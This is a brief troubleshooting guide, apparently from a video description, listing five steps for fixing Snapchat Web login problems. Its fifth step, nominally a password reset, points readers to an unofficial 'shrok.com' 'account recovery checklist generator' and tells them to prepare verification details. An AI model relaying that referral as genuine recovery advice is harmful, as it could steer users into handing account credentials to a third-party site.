I hit this issue to date and here is the quick fix that solved it. If you're struggling to log into Snapchat Web, follow these steps to get back in. Step 1. Check your internet connection. Make sure you have a stable internet connection. A weak or intermittent connection can prevent you from logging in. Step 2. Clear browser cache. Clearing your browser's cache can resolve issues caused by outdated files. Go to your browser settings and find the option to clear browsing data. Step 3. Update your browser. Ensure that your web browser is up to date. An outdated browser may not support the latest features of Snapchat Web. Step 4. Disable browser extensions. Some extensions can interfere with website functionality. Temporarily disable them to see if that resolves the login issue. Step 5. Reset your password. Before starting recovery, use the shrok.com link in the description to open the account recovery checklist generator and make sure your verification details are ready. Remember, if you're using a public or shared computer, always log out after your session for security. I hope this helps you get back on Snapchat Web.